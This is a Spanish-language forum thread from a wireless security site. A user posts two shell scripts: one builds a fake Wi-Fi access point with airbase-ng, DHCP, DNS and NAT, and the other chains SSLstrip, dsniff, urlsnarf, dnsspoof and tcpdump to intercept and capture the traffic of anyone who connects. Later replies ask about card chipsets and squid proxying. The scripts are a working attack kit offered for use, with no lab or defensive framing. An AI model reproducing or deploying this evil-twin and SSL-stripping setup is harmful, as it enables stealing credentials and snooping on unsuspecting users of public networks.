Seguridad Wireless - Wifi
Sistemas operativos => Zona GNU/Linux => Mensaje iniciado por: sch3m4 en 20-03-2009, 20:27 (Viernes)
-
Aquí os dejo un script para crear un punto de acceso usando airbase-ng, lanzar algunas herramientas a modo de ejemplo, y el enlace a la publicación:
http://opensec.es/2009/10/05/creando-un-punto-de-acceso-falso-ii/
#!/bin/sh
#
# Scriwap 1.5 - Script to create rogue AP
#
# Chema Garcia (a.k.a. sch3m4)
# sch3m4@opensec.es
# http://opensec.es
#
RUTA_AIRBASE='/usr/local/sbin/airbase-ng'
RUTA_BIND9='/etc/init.d/bind9'
RUTA_DHCPD3S='/etc/init.d/dhcp3-server'
RUTA_DHCPD3='/usr/sbin/dhcpd3'
RUTA_CFG_DHCPD3='/etc/dhcp3/dhcpd.conf'
RUTA_SYSCTL='/sbin/sysctl'
RUTA_IPTABLES='/sbin/iptables'
AIRBASE_IFACE='at0'
LOG='.scriwap.log'
function check
{
if [ ! $? -eq 0 ]
then
echo -e "[!] Error - Check "$LOG""
exit $?
fi
}
echo "###############################"
echo "# SCRIWAP 1.5 #"
echo "#=============================#"
echo "# Chema Garcia (aka sch3m4) #"
echo "# sch3m4@opensec.es #"
echo "# http://opensec.es #"
echo "###############################"
echo ""
if [ $# -lt 4 ]
then
echo -e "Use: $0 <iface_inet> <iface_monitor> <ip_gw> <netmask> <airbase_opt>\n"
echo -e "Ej: $0 wlan0 rausb0 10.0.0.1 255.0.0.0 -P -C 2 -c 6 --essid Wifli\n"
exit 1
fi
if [ ! $UID -eq 0 ]
then
sudo ls / 2>&1 >/dev/null
fi
#comienzo de parametros de airbase
ifacenet=$1
ifacemon=$2
ip=$3
mascara=$4
narg=$#
num=5
while [ $# -gt 0 ] && [ $num -le $narg ];do
param="$param $5"
shift
num=$(($num+1))
done
param="$param $ifacemon"
#Activamos el IP Forwarding
echo "[+] Setting up IP Forwarding"
sudo $RUTA_SYSCTL net.ipv4.ip_forward=1 2>&1 >> $LOG
check
echo "[+] Stopping DHCP daemon"
sudo $RUTA_DHCPD3S stop 2>&1 >> $LOG
echo "[+] Stopping DNS daemon"
sudo $RUTA_BIND9 stop 2>&1 >> $LOG
echo "[+] Flushing 'nat' table"
sudo $RUTA_IPTABLES -t nat -F
check
echo "[+] Adding iptables rule"
sudo $RUTA_IPTABLES -t nat -A POSTROUTING -o $ifacenet -j MASQUERADE
check
echo "[+] Setting up Acces Point..."
sudo rmmod tun 2>&1 >> $LOG
xterm -e sudo $RUTA_AIRBASE $param &
sleep 3
echo "[+] Settin up interface $AIRBASE_IFACE"
sudo ifconfig $AIRBASE_IFACE $ip netmask $mascara up
check
echo "[+] Starting DHCP daemon"
sudo $RUTA_DHCPD3 -cf $RUTA_CFG_DHCPD3 $AIRBASE_IFACE 2>&1 >> $LOG
check
echo "[+] Starting DNS daemon"
sudo $RUTA_BIND9 start 2>&1 >> $LOG
check
echo -e "\n[+] Finished!\n"
exit 0
#!/bin/bash
#
# Chema Garcia (a.k.a. sch3m4)
# sch3m4@opensec.es
# http://opensec.es
#
RUTA_IPTABLES='/sbin/iptables'
RUTA_SSLSTRIP='/home/sch3m4/FakeAP/sslstrip-0.6/sslstrip.py'
RUTA_DSNIFF='/usr/sbin/dsniff'
RUTA_URLSNARF='/usr/sbin/urlsnarf'
RUTA_DNSSPOOF='/usr/sbin/dnsspoof'
RUTA_P0F='/usr/sbin/p0f'
RUTA_TCPTRACK='/usr/bin/tcptrack'
RUTA_TCPDUMP='/usr/sbin/tcpdump'
PUERTO='4664'
RUTA_HOSTSDNS='' # You have to create a file to use dnsspoof
if [ ! $# -eq 1 ]
then
echo -e "\nUse: $0 <iface>\n"
exit 1
fi
if [ ! $UID -eq 0 ]
then
sudo ls / 2>&1 >/dev/null
fi
echo -e "[?] Do you want to save the capture using tcpdump? (y/n): \c"
read SAVE
if [ "$SAVE" == 'y' ] || [ y"$SAVE" == 'y' ]
then
SAVE_FILE=''
while [ -z "$SAVE_FILE" ]
do
echo -e "[?] Filename: \c"
read SAVE_FILE
done
else
SAVE_FILE=''
fi
echo '[+] Adding iptables rule'
sudo $RUTA_IPTABLES -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port $PUERTO
echo -e '[+] Launching SSLstrip...\c'
xterm -e sudo $RUTA_SSLSTRIP -l $PUERTO &
echo 'OK'
echo -e '[+] Launching Dsniff...\c'
xterm -e sudo $RUTA_DSNIFF -i $1 &
echo 'OK'
if [ ! -z "$RUTA_HOSTSDNS" ]
then
echo -e '[+] Launching DNSspoof...\c'
xterm -e sudo $RUTA_DNSSPOOF -i $1 -f $RUTA_HOSTSDNS &
echo 'OK'
fi
echo -e '[+] Launching p0f...\c'
xterm -e sudo $RUTA_P0F -i $1 -U -t &
echo 'OK'
echo -e '[+] Launching TCPtrack...\c'
xterm -e sudo $RUTA_TCPTRACK -i $1 &
echo 'OK'
echo -e '[+] Launching URLsnarf...\c'
xterm -e sudo $RUTA_URLSNARF -i $1 &
echo 'OK'
if [ ! -z "$SAVE_FILE" ]
then
echo -e '[+] Launching TCPDump...\c'
xterm -e sudo $RUTA_TCPDUMP -i $1 -w $SAVE_FILE &
echo 'OK'
fi
exit 0
Disponibles también en:
http://pastebin.com/f671cce89
http://pastebin.com/f332a2d1a
-
estaba buscando algo como eso jejej
pero yo lo que tenia pensado era configurarlo con el squid
he encontrado muchos manuales como configurar el proxy pero esto con 2 tarjetas eth, alguen sabria como seria con una eth0 (conectada al ISP) y otra wlan0 (hará la función de AP)
mmm, si alguien puede echar una mano xD
sólo añadir que las targentas que tengo tienen chipset rt61 y rt73
y otra dudilla jejej en el enlace pone que si no utilizas este programita tienes que poner tu tarjeta en modo master (y que lo soportan solo atheros) y mi rt73 con los drivers de windos me pone "Cambiar a AP modo" (traducido asi suena un poco mal jeje). pues eso que si mi tarjeta no la podría ponere en este modo y utilizarla con el squid
salu2!
-
echo "Uso: " $0 " <iface_conexion> <iface_monitor> <ip_gw> <mascara> <opciones> <opc_airbase>"
echo "Ej: " $0 " eth0 wlan0 192.168.1.1 255.255.255.0"
Te has leído la documentación? http://opensec.es/2009/03/20/creando-un-punto-de-acceso-falso-airbase-ng/
Los drivers que estás usando para tu tarjeta en linux no soportan el modo master, (aunque en windows sí puedas), en linux hay varios drivers que permiten el modo master y uno de ellos son los drivers madwifi para atheros. Para solventar este problema, hicieron airbase-ng, lo que hace que puedas crear un punto de acceso en modo monitor sin poner la tarjeta en modo master, es que airbase-ng lo realiza todo en modo usuario, y al ponerlo en modo ap, se hace en modo kernel.
-
he estado buscando y parece que no hay remedio, o uso una atheros o airbase
creo que me quedo con el airbase... esta noche ya haré pruebas... por ahora siguire investigando xD
y una cosa el airbase tambien tiene una casa oscure :O jejej, bueno tampoco es de sorprender es de la suit Airgrack-ng mmmm jajaja
xAU
-
Actualizado ;-)